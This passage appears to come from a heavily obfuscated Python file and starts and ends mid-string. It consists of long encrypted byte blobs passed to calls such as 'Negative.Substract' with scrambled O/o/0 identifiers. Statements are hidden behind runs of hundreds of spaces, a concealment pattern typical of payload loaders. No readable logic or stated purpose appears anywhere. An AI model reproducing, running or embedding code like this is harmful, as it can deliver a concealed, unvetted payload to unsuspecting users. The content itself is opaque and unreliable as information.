x83$\xaa=|\x01b1(\x96\xb6\xe26l\xaf\xd2\x1e`<\xd2%\x06\xa1\xa1\x17\xb7\xa3\xed}K\x1c\xacRw\x17\x8e\x92\x16\xa0@\x9d\xdb\x83s\xf67\xdb\xd7d\x7f\x83\xe7\xcf\xc6\x8d\x92c\x03\xcfq\x00v\x02\xff\x00\xaf\x12X[\x92\x069\xc8q\x12\x05d\x13\xd3\xa0]`v\x86\xfa\xcad\xc7\xeb\xaf\rx\xa9\xbdt,)\xe7\xba0qH\xf6\xf5r\x98\x03gJ\x1c0%7eP\xcc\x95u+Q\x8b\xae\x18X\x13\x87Pwir#\x0bYSV\xb7\xdb\xb8\xd3\xc6\x89\xfb\xb6Xp\xac\x18\xfb\xfc\xb3C#\'8\x93\x12p*\xc5\x035\x9d`\xf2\xc5p\xae$\xe0\xb0A^\x94kPB\xaeI\xff\xc07\xf8^\xd6\x8dB\x0cVpq\xb9%:\x07 \xed\x8a\x8a\xa5\x87\xac\xbc\xb5c\x968\x82\x88>\x9d=\xfbJ\xa2\xfa\xae\x1a\xe4\xdc\x13 \xa4\x1d\xa6\xedZ"\x9e\xbd\x8eW\xa9\xdb\x8dY\xa7{3\xe9\xc0\xd0X\xd8\x83\xcb\xa6\xb7\xb0\xbf\x1d:*\xe4Hz\xc9\x95\x84\x81\xe2\xc6\x81Z|\xdap\xb2ap\xab\x1e\x18\x9e\xc4\xb14\xb8\xe6\x9f"\x9b"\x10EI:\xf0%\xb2D!_\xd4\xa2\x94\x06\xfb\xd0)\xdd\xbc0\xe2@\xbc)\xa0\xda\xbb\xe3\xb4)\xf2\xd8dW\\\xdan\xdb\xa6\xebO:p\x89\x92s\\{{LTB0\x17\xf7\xb88\xcb\x0f\x17\xf6ute\xc7\xaa\xeb\xf8u\xaft\x95\xdb\x8b\xc3\xd3\xb3\xd6>qq\xc8v\x943\x9fT\xa9\xbbC.\xe3\x1a!\x12\xee\x0e\xc3tg\xc7\xa2\xc1]\xd8\xb8\x0c\xfe\x1eX\x0eF\xee\x92]\xa2s\x838\xec\x03F\x17:^\xe4\xa1\x8cP\x1b\xad\xc1k\xec\x03\'\xe5\xc5o\x07\xbb\x88\x14\xf2y4q\x12\x90|N\xb29\x0b\xe9\x07*1t\xa9o%Vn\xd0\x99\xfeV(9\xe0\x19t\x84\x81[C\xb4\x1a\x83\xa9\x93h\xdf\x0f\xd6\xd6\xe1\xf91\x8d\xdc."\xec\xad\xccfS\x1d\xa82`\x8e\xe2\x01\xf3LO[\x0fOi\x98\x14\xf5\xe8\x9e\xd1@\x8b\x05\x1am\x80S\xb1L\xa6\xdbr\xff$>DV\x1dq\x87H\x19~\xb7\x9c\xf7eu\x1bP\xf5W4a\xf71\x9dr\x80\xdc\x02.\xbe\xfa\x8c~\xcb\x956j\x13Y\xa1mp\x87\x00<\x06\x96+\xa9J\xdd\x8a\xae\xa4:\x94\x03\xc6Zl\xb3d\x19\x0b\xb2\x89W84\xe8\xc1\x96q9\xb3\xd2.\xe7\xd31\xe3V\xfb\x88\xdbhF,\x1fz\xf1pc\xb4\xb0\xfa\xd0\x96sP8\x00\xfb\xaed\x16XK1\t\xb0\xfa\x9c"\xbaOM\xcb\x10@\x17\x03\xf3\x8e\xb4IG\xf8\xdd\xbc\xaf`\x9d\x0f\xa1\xf5;\xed\x05\x897\x0f\x1a\xa8\xa1\x80`\x84\xfc3\x80_T:(h\xa3\xa5:\xa8{+pV\x08h\x1f0\x8dd\xafX\xda\x9a\x15\xd9\xb5&2)\x1bl\xb0"\xaf\xab\xbb\x83\x9bj\xf7\xdc\xd3`"l`\x07X\xe2=\xa0\x12\\7\xee\xcb\xef\x80\xc7~\xcc\x18y:\x80\xa5\xa3\xcf(\x8f\\i\xf9\xad\x0c\xf1vQ:Op\x9cJj\x85\\i\x953\xea\xf1\xf1\x81\xbb2\xc6\x1d\xf9\xc5\xd2\xf2\x15$\xc2c\xf7\x10\xb0\x122k\xcd\xa0X\xda\xad\xa5D\x96S?\xccr{\x08\xbe\xb0\x9f[f\xca\xea\xee\xb2\xcc\x1c\x84\x93\xf4h\xc8<|\x1cf[!I\xdb\xfb\x19"\xf7\x95[\x99W\xbb\xc4Z\x03\xd7\xbdc\x9d\x0e\xf4f;J\xa3\xfdk\x1b\x04\x83,\n\x7f]\xc6\xd7\x9f\xc0\x86\xce\xb1\xb9\x08\x98\x84X]\x00l5\xc2\x1e\x0b\x1eV\xc4iA\xb3i\x83\x90\x85=.\xab{\xa0z\xf5\x11B\x8d1\xa9\x08@0]h5\xb8\x07e\x89\x9f\xc0\xe7\x0c\\6!\xa5\x80F\x80\xa1\x87^\xe7B\xe9\x01X\x01\xf7\x18\xf6\xd0z\x16\x18\xda9\x1e\x8b\x8e\x87\xc7,\'Gr\xd1\xf3O\xdc\xde=\x8c>\x1a\xb0\xb0\x96+-_\xe1\x89\x95:d\x91\xc0c\xce\xfeBi+X\xa8>R%\xf5\xf0\xf4b\x0e\xa1\xca\x94\x94\x9fn\x8f\xd9\x96B\xbcN\x0fw\xe2\x17K\xdf\xa37\xd5\x156\x91D~\xa6V\xb9\x10x\xe4\xd5Z\x97\x04=\xb5\xd6\xd4\x17?\xbf\xca\xe1/\xe1\xd8\x8c\xf8l4Y\xf6,\xc1\'\x0f\xee \xcb\xb9\x99,\xcb\xeav\x93M\xd9JO\xd0\x1a;\x04e#`\xc0\xb6y;\x00\xc4\x9f\x17\x1a0\x8d\xf0@\x84a\x96\x1f"\xb0<\x1feuw\xe6\x8f~_i`s\xcb\xe4b\x87g\x99H\xfd\xc2\xff~6\xb4\x9f\xce\xbbg\xec\xa8\x13+\x1b\x1f\x97\xb4\xee\x1e\xad\x8f8\x87[\xb9\xe20[\xf1\xe1\xa8G\xfd\xd9\xd9\x9aWl\x82FQ\xd2"\xcb\x84P\xa5nWAc\xcd\xec7\xe8\xf0\xe1\xf8\x90kFf}+\x8f\x12igJ\xf1sS\xb6=\x85\x87\xb9)e[\xdd\x8a\xecY\xef"\x17\x7f#\xec\xdb\xb5i\xde\xeb\xd2(\x9c-M\x17[\xbd\xca\x0f\xb3\xab\x9d\xc9\xfbh\x82g\xca\xeav\x95Gv\x10\x81\ry\x8ekb\x176\xe4\xac\x1e\x9d\xd7\xa9;\xb0"\xb7\x00U\xb2\xf6\xaeW4(k\x04\xc6\xb7Yn\x85\nLS\x80\x85\xd9\xdc\x7f\x9b\xea\x1a\x8bh\x03\xf7\x8e\x8b9\x80z(`\xf7\x91\xa9`\x80z\\\xa1\xb4\x91QWp\x87B\xfe+\x1e\x1aC\xe6h\x8c\xbaeu\xabJ";[\xf3\xb3\xcc\x1b\x9b\x199\xba\xb2\xe9\x87\xfb\xc8\xd6\xcb$\xa7\xf0)\xef\x91\xa6<\xa5\xfc\xa8B\x81*\x04\xa8?\xe3ujN\xf6\x81&\xf3\x9cj~-\xc3\xa9\xa5\xbe\xb5\xeeI\xee\xa1\xdf*\x8e\xe6\xdd\xd0\x03d\xe0bA\xa4\xc9\x01\x04\xd5c\x90<\xf0j}>5\xb9:\xba\xb0\xb3\x0e\x0c\xa2\xd7\xd8 \xf3\x96\xc8.\x00~a\xed\xbbut\x8f\xfe~\x00s.\xc1\x8b\x03\xfe\xb4E\x19%\xc8\x96\xe9\xf2\'N\xfc\xa9Yr\x85\xe2m\xa2\xd3$\xc8\xb0cj\xbb\xd6\xbbe{\xc0*\xe2\xfe!U\x84t\x93C\x85\x93\xc5\x16\x10\xa7n\xe7]\xad4\xd7\x11\xa2\xe8P\x0fk\xc5|\x01vC\xca\xdf\xee\xa2g\xd2\xbb\x8d\xd8n\x98+m\xc5n8\x00\xd7 \x86\x96x\xbc_p\x1f\x92p\x93)-\xdbQ\x80\x16l\x0f\x93\\PJ>ph\x86\xc5\xd2F\x1a\xaa8\xab{\xa1\xc9\x07/\xa1\xba}K\x1e\xaaRwG\xcbL\x1baS\x1cX\xd4>$:\xcb\x9d\x98\xcd\xd5\x9ddl6\xb3z\x1co\xd4y\x9b\xf9\x87\x05j%`a\x81]\x89r\x16\xe5\xf2El\xab[\xd1\xd4\xb9y\xae\xe2\x99J\xec&\xa5cw\x80~\xf4\x01\x9a\xef{8$\x068P\xbc|\xe9\xbel\x98\xe0J\n0H\xd1C\xb7\x04d\x95\t\xb4\n\x92)\xed\xd6K$\xfa\x85 \xc6lJ!Q\xbfz\x16\xebnY\xdd}\xfa\x07Z \xd7^\xdcS\xd2r\xfc\xbbGxJ\x05DP\x9f\x19F(\x83i\xc4\x88\xa0Bi\xa3\xc9R\x8c\x1fb\x9e\x93\x1c,&\xb5\xa1\x99,\xcb\xeaV\x84B\xbe#\xfe\x022\xc9cVnJ\xcf\rRe#\xb3\x93\xb4\x82\x8dT\xf1BC\x1a\x1d\xe48[\xb6\xd5\xed&\x91i\x07y\xa3\xb7\xaa\x18\x02)\x16\xde{\x038\x9e\x18V\xfc\x83\x87;\xf01\xf9:\xf1S=\xbb\xb5\x00\xef\x81\x82\xb2\xc3H\x81y\xa4\x8d\x1e&\xd3\x0bm\x1b\xa3G\xdb\x8a\xe5>\xa8+L:\xde\xf5\xdf\x9aPW\x80\xc4\xd0\xe7\x1c\xd7d\r\x0cQ^\x18d\xcbZ\x91\x16b\x96\xb1\t\x04\x80\x94U\x9f)\xa1S\xaet\xef\xbe\xfb\xed\xde_q\xbf|\xab\x12 \xdfLH\xd9C\xa2\xf5\xc6\xbe\x93q\xca\xa9\x120Y\x0beN8T\xf6:/\x88\xd1\xf4\x197\nBc \x05\xe2(p\xb3\x842\x8b`*!v\xe9\x80\xb1\xbb}\x86\xa9\xe4J\x1bi*\xb1\xa5\x81\xc4\xd6Z.\xe8T;\xb3]Y')

        Hypothesis.Positive(_ceil = Hypothesis._system - 16353)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='Ooo000oo0oo0oOoOo0oOo0OO',Frame=b'\xdd.c\x87\xdb\xcd\'\x07\x106z\xc1*\x9b"\xb7`\xb9$\x8b\xa4\x14\xb7\x82?\x8a\x19.U(m\xa4^\x08\x9b\xa6\xb83\xc4\xe3c\xbb\xff\xca\xea\xed\x80(>\x9c\xf0\x91M\xc9;\xec\xf0\x18\xdan\x1fp\xa1z\x95\x1b\x04\xea3\xa8\xefp\xdf"Ud\xdc\x97\xd6\x96\x84\xc6$\xed;5\xc3}8P$\xf5\x88Ix<\xb1R!\x1bK/m\xd5Lz\x8b)\x1b?\x0f\xaaD\x1a4\x93\\\xfb\xa1q*\x8aQ\xcd\xd6\x13\x830\xeb\x84,\xab\xbb\x8b\xd1m\x13\xc5\x15\xa7\xb3\xa2lV\x9c\xd8j_h\xd9\xaa\xf6\x1b4\xd4\xba\x98Fs@lRl\x9a\xc9\x95\x1e\x00\xcaWn\x8f\x8d^\x13\xe2H\x9d\xa25\x17\xeb\xbf\xad\xee\x0e\xf0\x94Vl8\x9d%}3*\xc0\xfa\x885*m\x7f\x92juQ\'<?r\xb0\x02\xce\x1fe\xcc\xfd\xc9\x94\xcb\xc9\xc3\xddl\xf2\x91\xd5\xf6\xd4\x1d\xb3|\x01\xd4\xc5\xeay\x8a\xfb~c\x83\x00\x19\x02\x1a-$I\x06\x1d\x93\rl\xd71\x97\xed/\x95\xdas\xdd\xfe2\x99c\x97\xd0\xec\x13R\xd2\x19\xa9}w\x06\x05#\xc8\xd8jv^\xfd\xb6\xcbZ\xbf6\xe0(\x8b`\xc9j\xa0\xac\xc1\xa8\xa2\xf14>o4\xaa\x04\xbb$k\xa7h\x10zb\xcd\xc5\xcdm\xaaw\xa8<\xe5\xcc\xc5m\xd1r\x97c\xbdK\x14\x82\xbc\x81\xb5o}\xc7\xffYJAY\xdd\xae\x92}\xabI;\x0c;\x89\xaa#F\x07J@J\xe8\xe4\x81\xc5\xfb\xd0\x01\xcb\x83\xdf \x0e\xe7\x8d\xe7vmq}m\x00\x01<x\x90\xc7\x91\xa6}\x14\x00,}?\xd4+\xdeW$h&\xe1\x8c\xc9\xabfgT3\xdfZO-\xd1\xd84\xe7i\xaa.\x8fY\x06\xbd2\xca=\xb0UQ\x10\xb6\x87\x91^ \xf2SHU\xa1\xb4\x15op\xcc \x0b\n D\x05\xf1S?_\xd6\xd8*&\xec\x01\xbe\xb5\x06\xd9\x13nY\xbd\x1d\xf9i\xdfi\x10\x03}\xf2\x08\xd3\xf1 \x85\xf2\xe8\xa2\t\x83\xb2\xe0qm\x18\xf2\xc0j\x1edX\xb1\x9c\x89eu;\x8a\xf2\n\xf7\x81\xa2M,\x0c{VR\xcf\xe0\xd9[\xc7\x96\xfah\xac\xbeSRzX\x9fgz\x9b\x94\x1e\xd9\xccpY\x8ci&\x19U\xebl/\x1d\xb8z\xad\xd9\xd9N\xfccJL\xc2\xb0\xc3\x9b\xa9\x89\x7f\x81\xff4%C\xb9}\xe86F\x83\x0c\x90-\x03\x98\'f+v\xa6\xac\x1c#4`\xc0\x9cXy<\xf4\xf9\xb9L\xf1\xa2Kk\xcf%2\x07\x88\xd3A@\x07\x12\xea\x80t\xe0\xb9|\x04\x9b\xeaRD\xd7A\xd3\x85\x1f\xa5\xa2b\xa1/,\x85\xed\x12=\xeb\xe8$\xc2he\x00/\x02{6,~\x00\xa0\x8c\x8b\xa5\x07\xe7\xf3\x7f\x7f\x01\xee\x88\xb1\x15\xe0\xfeq9\x9dZ\x8a\x89\xa5\xea\xa7T\xeb\x9c\xcbd/Q\x11\x02\xc4\x9e\xf2\xd6@\x03\xb3\x07\x96\xc9_\xc3\xb7\x0f/\x1ek\xe7\xf9\xdeJ\xf7v\xe06N\xb4(\x12<\x08\xb7\xc6\xe5D\x1c\xef\xa9q5\xcc\xf1A\xae\xf2Ka\x1fh\xc0? \x16{\x01\xfa\t*S\xc7\xf0Z\xabIY\xdd\xb8\xfajr\xa8:j>\xcf\xae\x1d?\x93e\xcdo{<`>\xf3\x19\\gW^\x0c\xdb\x85\x9c\x079\xd9\xf0\xa7\xc3\x8c\xdb\xc7h\xf7\x87\x95N+]\x1e\\\x02.\xb8\x1e\x06\x1c\xf41\xa1\x0b\xd0\xa4Q\x80f\xa1\xf4\x801Em\xe8\xb2DT\xb8X\x00,\x96\xb8\xf3\x1ai\xb22\xd65\x10\xdf\x9a\x0f\x10\x82ai\xb2eu\xbb\x82\xc5v\x9f\x19J\xb2@IF\xa8~\x1c\xaf+\xad\xe9\xdco\xe4\xce\x95\x88\t\xf1\xc6\x8b9a\x10\x1a\x9cR\xdf\x9a\xd4\xcb\xeaV\xc5\xcdl\n\xf2\xc3\x9e\xb7D\x9a\xc6\xe5=\xe2\xb3\x0f7\xc6\xaf\xe3\x8ecE\xf9\x99\xf7\x89\x16\x1b\xa7Z\xa0\xe4x\xbf\xc3s{m3\x81X\xceI\xe3\xb2\xd4\x99\x19\xa4,b\xa7\xe5\xcf\x86\x17\xb6\x02\xaa\xb2\xa47\x9a\xf8\xa6\xed+j\xecw[`l\n|C\xce\xda{\\\x04`\x00\x1e\x9c\xe2\xbb\xb3\xd5+\x81\xd4\xa3\xaa3\x81\xeew\x17C\xfau\xb7\xb3\x0c\x80\xb15\xc3\xf7sy\x00k\xcf\xf2\xddw\xe5#\x8alxe\xf7\xdb+;\xdf^K\x19\xf0\x9a\x03\xc6\xc4\xd8o\xa7\xa3\r\xed\xef\x16`\xac\xacn\x97\xc2U;\xb2);8__\xb9\xb9\xe9 \x07j.\x89\xad\x98\xa1nrJ\x18\x8a\x9a\xa2q\x9f\x91\x9d\xad\x9b\x13\xdaI;\xc7\x94t\xc2\x11\xf5M>\x0e\x00\xa3\xb7\'cb\xfbL\x7f[\x16T\xf1\x8b\x04\x19\x1e\x8e\xb9\xe1\xe3\xa8\xe6/\xd1\x103\xa4\xae\xc5w\xc89>NO\x81\x91\xd5\x05\xeb%1\xb5\x02\x00m\x03\xba\xecH\\\xba\x9e\xc9\xc4\xd4 \x8b\\hH\xa8\xecOQ\x87pz\xb3$\xf0\xb2\xba\x1d%\x1bl,_`\xea\x15y\xbb@\x8f)\xe4\x9f.\xcd7]\xc9\x9d\xeda\x00\xc1\x80I\x08\xc0vO4\x08\x85\xd2\xb2\x1d\xf5\xb1\xa2\x87\x8c\xab\x14\x1b\r\xd9\xad\x07\xc5\xd2}\xda\x01j\x0f\xd0;\xa2\x90\xe9\xc8=\x9b\xc9\xb7j\x1b\xbdl\xb3\x98\xc9\x18wp\x12\xef\x90r\xff\x1ahx\x05\xc7_\xa3yY\xa8\tz9)F`zAN\xda)\xab\xdb\xa1\xb4\xb3_+\xea\xba\xe4\x82\xd9nu\x98\x96\xc6\xad\n`\x92\xe39\xb5\xd96\x92\xfa\xdc\x1a\xdb\x86D8\x0fa\xc0\xf7 \x7f\x0bl\xd7\x1f\x1a\x90\x18|\xc8\x19\xb2F\x9c.\xablp\x048GR~\x0c\xe2\xb3\x06\x87vX,mEDj\xce\xb2\x19Y\xc3i`\xad\xa0\x82H\x8a\xac0\x86\xb2\xbaU\x19Fj\xcf\xe6z\xdd\xa8\x92\x1cq+\xf9\x04\xda\xd6\x16\x98\x17\xb5\xd1L&\xd9\x1bE\x10\t\xc3\xacY0\xb4f\xb2\xb2\xba\x15\xa3@v\xe6\x89\xaf\x9f%\xfe<e\xc8\xf6\xf8\x1c\x83l)\x04\xe10m\x91;\t\xfc\xf5\xa1\x98qa;\x07\xf2i{\x92\xf6&\xdd?\xc3\xa9\x9a*\x81\xec}\xeaO\xbc\xdaf\xa1#\x8c\xc1\xc6\x07\x04d\x8f\xcf\xe1\xfbyi<\xac\x87\xbc\xfe\x03\xa4\x03"B \xca\xebS(m\x04\x01\xf2X\\\x90\x14\xe5v\xbar\x9bI\xa9J\xdd\x1d\xe6\xb9\x1d\xfbp\x9f\xfbp\x15\xfde#\x0eS\xa9\x17\xb0V]\x90\x8e1\x82eltQ\xa2b\x94Ls\x02\x94\x12\xd2T\xdb\x8d\x1d\xe5\x04\xb6\xb2\xba?9,{\rM\x98\xbdeH\xc3X\xc4i\x1d\x989\x88=LG7\xc0$=\r\xb2\xb1\x80\x82\xcf\x9a>|\xbc\xa7\xf9\xad\x12WZE5\xd8E./\x17\xf3\xc4qJHD&\x16Jk_\xb0\xee\xc9\xa1\x95uGF\x02\xcf\x1d\x91\x15NSVwW\xb9ig6\x1a\xe1\xa3\x11N\x1aa\xa7\x11\xda\xddHCp\xbb \xe1\xed\x04~e\xd6\xdcb\x90\x84\xfd\xad\xdf\xc9\xaa\x1c+\xd5\xc9W\xa3\xb0\xe7\xcd\x83~\xa4\x94\x0c \xab\x8d\x94 \x87\xec\xa0I\x17!\x80\x9a^X\xd3\tk\xbeS\xden\xfb\xbeu\x9a|wb\xb1c\x19\x8e,+\xa1D\xfb\x16\xef \x84\x15!\xf0\xc3@\xc98J\xce\t"\\)fj\xab\x07I=\xd5\xfd\x8b\xd4\xac\xaa4\xc8\xd8\x0f\xc9\xa1\x04\x89\xd0\xfc\xfa\x0c\xaf[z\xf0\x1a\xf6\xa4|\xcaVC\x0c~x\xd0\xc8\xa3\x07M\xe3\xba\x92\xb4\x1a\xa5\xd9\xd0\xc1\xb2\xe8"__\x88\xb2\x1d@\x8ac\xb4,\x16J\x0f\xd9\x95\xda\x92\x13Lr\xf8|\xe3\x90\xb7o\xe4@9P/\xd8>\xd2\xc9\x0c\xac42S\x9e\x17\xa6\xfcj\x1dB\xa8%z?4h\x1e\t \x12\xd0\xbf\x1d\xa3U^\xb7\xae\xcc\x8e\xd8q\xc8\x8bG<}MTlq\x82\x88\x8dAT\x16\xa1Y\xc4\x80hK4\xd9V\x17\x93>t\xd3\x99\x08\x8d\x10\xbaH\xa5\xad&Y\xf0\x97\xc5\x1d 93\x99\x89\x0c\t\xe3\x84\xbb\x94\xfeo\xebx\x04/\xaaM\x94]\xc1\x0ca\xa2\x89\xe2\x0c\xfe\xbc\xf4\x88\x87\xc5\xc1\xaf\xa9}\xec\x8c\t\x13\x1d%0\xed\x00\xd0\xd5\xd6\xe4=\xba\x00\xcf\x1d\x99\x85G\xa3R\xbb\xf0{\x19\xc5:\xc9D\xf7\xf6*\x91\xe9o\xf4W\x9e"\xb2\xc7\xc9\x9e\x07\xc8\xc9\xeer\xb4\x98W,-\xdbQ\x8c\xc6s\xca\xe0\x1c Y3@\x94\xfb\xc5\xd2V\xcc\xeb\x03\xf4\x9d\x06\xe4\xec\x848\xa8\xcf\xc4_\x9d)+\xdf\t\xd9\xfe=\x0c\xa3\x12}\xd4EO@\xa6\xb4\xfc\xda)/\xb5\x8b\x9f\xf0\x1e\xe1\xb5\x17J[Q\xa3\x07\xb7D\xab\x1f"\x1f\xe6@\x9f\xb6\x9f/-\xdb\x11x\x8b\x07\x18DF|\x83\x94\xcb=(\x96\x1e$\x1e\xa4\xec\xf5N\xf3\xcf%\x1d\n\x0e\x8a\x07\xbel\x12\xd4"\xb4T\xb63\xc2\xe6f&\xe0\xb9\x91\x84\xca\xeaVd\xbe^o\x08\x8a\x11\xa9\xd0\xc7i!\xc4\x170\xb3\xae)\xed\xb6\xbb\xd4A(\xec\x8e\x1d\x10\x16h\x11F\x06\x19\x19\x18%\xe0\xae\xc2\x85\x9b%V8\x02\xc2U\xf4\x0e\xe1\x1b\xfb\x86\xd4\xb7n=\x96"oK0\xae\x8d\xf9\xc9\xa7\x1a\xadRw\x07n\xbd\x9d\xdd\xd0\x12\xb4\xd6 \x90\x17(\xbc9I\xf6\x18"\xf4\\J\x9c]\xbb\xf9\x84sN(&$\xe2D\x06\xb4x+\xcb\xeau\xe2\xa94.gK\xff\xb0#\xb1\xfd\xdc\xcd-\xaf\xdb\xba#0c\xe6/\xc2\xdbg\x1d\x18\xfc[\x8c\xd6="\xec\x19\x08\xacCt\x10]\x8c\x10\xf4sQ_z\x15\x85XX\x0e%\xc6Qg\x9a\xb4zU\x95\xba\xdd\xf8\xc0\xdbZu1\x98\x9e\xb8\xf8\xc8k\x02\xdaz\xa3H\xef\x8e\xa5\x7f\xa5\x88v\xcfHb\x98If\x05\xae\x92\x96\xd1=\xa0UG~\x10\xfb\x03\xd5\x9b&a?\x98\xc4\x93\xa8\x07VZ5F w9p\x88\xa9\xf2P\xddg\xb5\xd5W\xdf{\x91\x1f\xcd\xc2H\xbd\xb0\xbe\xd2*\xbdH\x9d!"\xab|\xbf\x17\x84QO\x95\'Q?\x1cD\xb3\xb8\x1fMC\x1f\xec\xbf\xbe\xab~\x97\xa8\xfd\xaa\xfd\xab\xef\x83\x18\x12\xa2\xd3\xef\x03\xd8\x9f:d\x10\xc4\xd1TiV\x9e\xdaW\xe2\x87\x91\xaf\xce\xc9\x83\xfd\x87~\xd0S\xcbk\x00\xf5U/\x9f\xc0wu>\x1e\xd6\x9f\x84\x830V\xe7\r\xe7\x1f\xaa\xa3\xb9a/\x8c\xd46\x9e\xa7\xba.Wm\xc7j\x7f\xae\x1c\x17\xce3\xf4\xe4|\xb6\x9cw\x88\xd7\xd9W')

        Negative(_add = 85765 / 54123)._round(_math = 98444 * Hypothesis._system)                                                                                                                                                                                                                                                          ;Negative.Substract(Product='OoDDDDDooDOooODODOOOoooOD',Frame=b'\xed\xd0\x0f=\xb5\xcc{!\x9cd\x12\x81\t9T\xdf\x03h\xb7x\x80\xfb\r\xa3\xa4\xfa~}/H\xf0w\xaa=\xd5\xf9\xe1w8\x8e:_\xd8\xaf\xfaT\xfbP\xd7\x84\xc7\x1dD\x81:\xaej\xa0@\xfd\x12\xda\xc9\xbe^\xb5\x1fh\xaf\x04\xeb\xa9\xf3\x8a\xfbX\x1ec\xdb\xe0\xf7\xe8\x8e\xee\x93\xbas\x03<\xce\x14\xda5\x98E\xf1\x9a\xf6\x8bU\xab\xad=\x8e\xba\xbe)\xb4\x7f\xa4~\x02\xed\xaaZ\x7f[\xfb\x86A\x04\xf7\t\xf6\xaf\xfe\x1f@9\x9e\x07\xdf7\xf8]<\x80\xf3\x91\xebR\xed\x04Lu\xaauC\xea\x87\x1e\x1e\'\xa1v\xa7\xf6\xd8r\xbe\xeaw\xeax\xaa}\xfd\x1e\xde\x97\x88\xda\x13\xf7C\xfbKT!\xdd\xb7\t\xfc\x0e\xfa#\x9c\']\x17\xf6\xbf\x01\xdc\x07\xbc\xeeI\x00\xfdm\xa6\xfa\xe6@\xfd\x1e\xda\xd1Wu\xa6p>j\xbfs\xf8=\xb4\xb3\xfa}\x84\xed\x19\xe0}N\xd48\x8aT\xfd\x01\x9e\xd7\x04\xeb\xcf\xa8\x1d\xf5u\xd6=\xcf \x18\xd4\xe7\xbf\xdbj\xff*2\xea\xe4]~\xb6\x8d\xacm{X\xf7)6\xe2\x8c\xeb\xd2\xe6\x11\xd2\x16\xbf\xd6-b-\xa4%\xd8\xb2Z0\xa7S&\x83\xa8.\x81G\xeb\xf2\x92\xabze\xedu\x8f4k<\n\xe9\xd7%j5\xe0\r\x08V\xdfG\xd3\x08Z3\x10oP(\xdd\xa7.\xaa\x83<\xd0R\xf7&\x06;\xb5\xc3\xd35W\xbdA\xda\x01\xc9F\xeb \xa4\x814a\t\xb1\x13K\x8b\xf9\xc0\xce6\xee[\xbe\x89\xb2\xba\xde.\xbe\t8\x897\xeb\x94\xe0\xcb\x1e\xd3\'i^\xcbk\xa1\xb8,\x0f\x90\x8a\x90B\x8br\xd0\x04\xec&\x8d\xf3e\xe5V\xd7\x1e\xc6j\x10g"Du\x90\xd5\xb5P\xdaH\xfc\x17\xc2=\xc1{\x89X\xaf\x15GK\xfc/\xab\xbb#\x12fg(l\x02\x02M\xec\xc7]Dsk\xa8\xbe\xe5t\x1a\x18\xef\xa5\x94ve\xcf\xe9\x00q2\xb1\xa2\xecM\xfc\xbddi\x98\xdaq\xf8\xad\x83\xf8!X9CA\x18\xc6\x80W\x00`\x7f\x8c!\x99]D\xf2\xd8\xa9\x9f\xed-Cmc\xc7\xf4\x1c\xa6k\xaa\xd4\xdd&\xf95\xcc=5,\nx\x85\xad/\xc8\x10l\xee)\xf1\xb2_{Q\xbe\xf2$\xc6\x90\xe8d\xf1\xad\x91\x19L<\xfab0\n\xac\x19\xc9\xceWT\xa5nGq\xc7\x851\xd0\x8cM\x9c\xe3t\x19qR\x1e\xc7\x12\xa1\x8b\'\xe0\xa8\x15r~\x85\xc5\xd2*\x1e;\xff\xd6\xd7\x9e\xb4\x01\x06\x13\xf6\x8b\xa5\xe5;\x02\xf4\x10\xa4\x81\xebS\x86e\xdcM\xae\xac\x1cl> \xaf\xdd\xed\x80C\x19)F\xb2P\xda\xd8"&0\x11\x89\xce\xd7y\x95s\xd6\xb0M\xf5\xaa\x84\xb84\xf7G\xc5\x08\x05\x8bkw-\x12\x96/\xe9x\x97\r\xfdP\x02B\xb1\x9b\xc1\xce\x11F\xf4\x9b\xa6\xf9\xca\xeav\x12\x05\xec\xfb\x1d\xc7\x99\xac\xa1\x8c\xcd\xa8\xb6\x1d\xc4\x98\xb4\x80\x07\xbc\xc2H\xf0\xab+\x13\r~\x986Q?hz\xfb\x8e\xaeE\x8ag\xe2\x832\xaa\xfa\xa3\x93\x10\xe7\xb8\xe8\x962\xbe\x83X\x0e!.Q\xb1\xb4\x15\xd4B3\x17\xdb>C\xb3A,\xf0\xa2\x01 \xc0\xa2Y\xed\xaeg\xe0\x93\xd7\xb2\xce\xe1\xadi<\x85\xcb\xda/~m\x9d\xc78\xa7\xd5\x94\xd5\xed\x88~\xbc\x95T\xdc\xc0qwo=\x16\xf5\xa9\xc6$\xbeQ.[R\x0b\x8a\xe2g\x03*\xab\xd4\xed\x8eM\x14\xfdi\x81\x84\xce\xb7o\xf3\x12\xeb\x96&\xf4\xe2O\xc3\xd9\xa1\x19<Z\x0f\xb6p)\x98\x8f\xaeQ\xe8\x01\x1a\x85\xf5\xbd\x99\x03i+\x12n\x94C\x88(\x93B\x9f\xad\r\x04\xd6rq\xd2\xcb\x94V\xc1aE\x08\x18\xf28\xcd{\xc8H\xac\\i9\xfe<\xe4\xaa\x01e\x94\xf8\x0c\xe8\xf3\\Y\xb9Y\x05\x90O\x03\xfcQ\x88\x983\xa2\xc9,\x94VA\x86\x85\x08[#\xd3\x8e\\V\x94/-\xb7\x16\xf9\x98\xc4\x15\xd0_\x00*sq}\x89\x8b\xa5\xef\xb1*4\x91N\xbb\xb6\xb7\x9bl`4\x1esy\xc3\xe6&0\xaa\xce8\x15\xb8\xa2K\xf8>Jb\xad\xe1\x8a\x99\xd2F\x88\x18\x99H{\xd6g\x10\x1aG\xbbk\x81&\xb6\xd5u\xab\x1bU7\x19\xcf\xc9h\xce\x0f\xb1\xa2\x97\xdb\xd0\x89q&b\x86Y\x18\x85\xbd\xcf\xc28\x93)\xed\x16\xf4%$\x9ey\x98\xbfo}\xca\xc2_\xa5n\xc7\xe6L\xdb8\x10\xfb\rx.(Fx\xc8\xc1\xc2\x14:\\?{\xcbA\xc5\x83\x96\x0c\x1d\t\xde\x10\xb5Q\x8c\xd3\xda\xd4\x93\x03\x93m\xab\xdb8Q\xeb\x16\xd3\xdd\xd4\xb0\xc2\xe4\xb7l\xba\xa1\xb6\xcd\xb0\xddd~1>\xc1\xc8\xd0\x9d\x06\xc2mF<f\xdd\x1b\x94\x830\x02d|}\x08$\xe5JY\x12i\x92\xd0(5\x02\xe1z\xd6K\xa4b\xd7\xeaiv8RY\xddn\xa4\xe7\xa6\xf6"J\xf4F\x1a4\xabk\xdf\xaa\x98#+)\xbe1z\xb6\xfa(,\x06\xc8W\x1e~&\x80|\xae\xf4\x8f\xa2A7\xe1v!S\xba\xc7&\x1bO\xde\x0f\xd3j\xb3\x9f\x9c%\xf9@\\;D\xd7\x04\xe3B\xd9\xcf\x86+\xc9\x13\xd2\x15s6\x98\xb5\xe4\xd0\x1c\x94dc\xd6\xc7C+\xf3\xff\xaf{i\x16\